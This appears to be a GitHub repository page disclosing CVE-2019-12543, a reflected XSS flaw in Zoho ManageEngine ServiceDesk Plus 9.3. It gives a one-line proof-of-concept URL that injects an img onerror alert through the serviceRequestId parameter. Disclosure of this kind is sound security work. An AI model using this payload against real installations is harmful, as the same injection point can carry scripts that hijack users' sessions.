Skip to content

tarantula-team/CVE-2019-12543

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 

Repository files navigation

CVE-2019-12543 Zoho ManageEngine ServiceDesk Plus 9.3 XSS vulnerability in PurchaseRequest.do

Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter.

Author: Concobe of Tarantula Team - VinCSS (a member of Vingroup)

Payload

domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=1%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E1

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published